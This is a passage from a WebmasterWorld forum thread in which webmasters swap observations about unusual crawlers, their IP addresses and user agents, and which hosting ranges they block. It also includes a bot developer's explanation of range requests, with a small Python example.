One-Offs

There weren't nearly as many of these as last year. Mainly:

Robot from UnityMedia
IP: 5.146.82.156
UA: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
60 requests, all 206, 301 or 404. Here's the odd thing: I have no record of ever seeing this IP before. But it must have been here at some time in the distant past, because it came in with a shopping list of files that ceased to exist up to two years ago. Hence the slew of 301s and 404s. The files that did exist were all old ones. But it wasn't programmed to deal with 301s, so it kept picking up the same redirects again and again without ever proceeding to the requested file.

AmazonAWS
IP: 184.72.175.146
UA: Java/1.6.0_24
33 consecutive requests for the same long page. Public-domain content, and the requests were generally a minute or more apart, so it's just the weirdness of the thing. How do they even find this stuff in the first place? What do they do with it?

dstiles




msg:4544717
 9:33 pm on Feb 11, 2013 (gmt 0)

I thought fairpoint was broadband?

I have 178.32.0.0/15 blocked as being OVH assigned to various EU countries.

208.128.0.0 - 208.167.191.255 I have blocked as being essentially sub-lets of savvis.

Yandex bot has many very small IP ranges.

lucy24




msg:4544726
 10:07 pm on Feb 11, 2013 (gmt 0)

I thought fairpoint was broadband?

Yes, they're infuriating. It's possible they have services that come with free www space-- my cable internet did-- so some people are using that for bot-running. Or, I guess, eliminate the middleman by running the robots directly from their home computers. All I know is I've met a number of robots from fairpoint IPs and I can't block the whole range.

Oddly enough I have never tried contacting fairpoint about the issue, so I don't know whether they deal with it. If they're anything like my current ISP's approach to spam e-mail, I doubt it.

Come to think of it, OVH itself is partly human, isn't it?

dstiles




msg:4545058
 8:58 pm on Feb 12, 2013 (gmt 0)

OVH may be partly human but if so it's not partlying on my server. :)

I have 5 fairpoint ranges and only 2 bad IPs since 2010 - one of 5 hits (across 5 days last December) and one of 7 hits (2 days last month). The latter began the hits with the UA below - I only take special note of the first UA and would have to search for successive ones...

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

cpollett




msg:4550685
 5:08 pm on Mar 3, 2013 (gmt 0)

Some quick remarks on YioopBot... It does range requests of 50000 bytes by default to conserve hard drive space, since it is running off some Mac minis in my guest room with 4 TB drives attached. It might scarf down more if the data is chunked, but it then does a post-download chop to 50K. In November I was doing single-day test crawls. From Dec 17 to the present I have been doing a longer-term crawl, about 240 million pages so far. Periodically this has been stopped for brain transplants, and I have also been testing some other kinds of indexing operations on Wikipedia dumps and the UT Zoo Usenet archives.
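
For readers who have not met range requests, here is a minimal Python sketch of what a 50000-byte request might look like from the client side. The exact header YioopBot sends is not given in this thread, so the "bytes=0-49999" form is an assumption, and the function name is invented. The request is only built, not sent.

```python
from urllib.request import Request

RANGE_BYTES = 50000  # the default size mentioned above

def ranged_request(url: str, nbytes: int = RANGE_BYTES) -> Request:
    """Build (but do not send) a GET asking for the first nbytes bytes."""
    # Byte ranges are inclusive, so the first 50000 bytes are 0-49999.
    return Request(url, headers={"Range": f"bytes=0-{nbytes - 1}"})
```

A server that honors the Range header answers with 206 Partial Content even when the file is shorter than the range, which would be consistent with the 206s on robots.txt noted earlier in the thread.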


All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved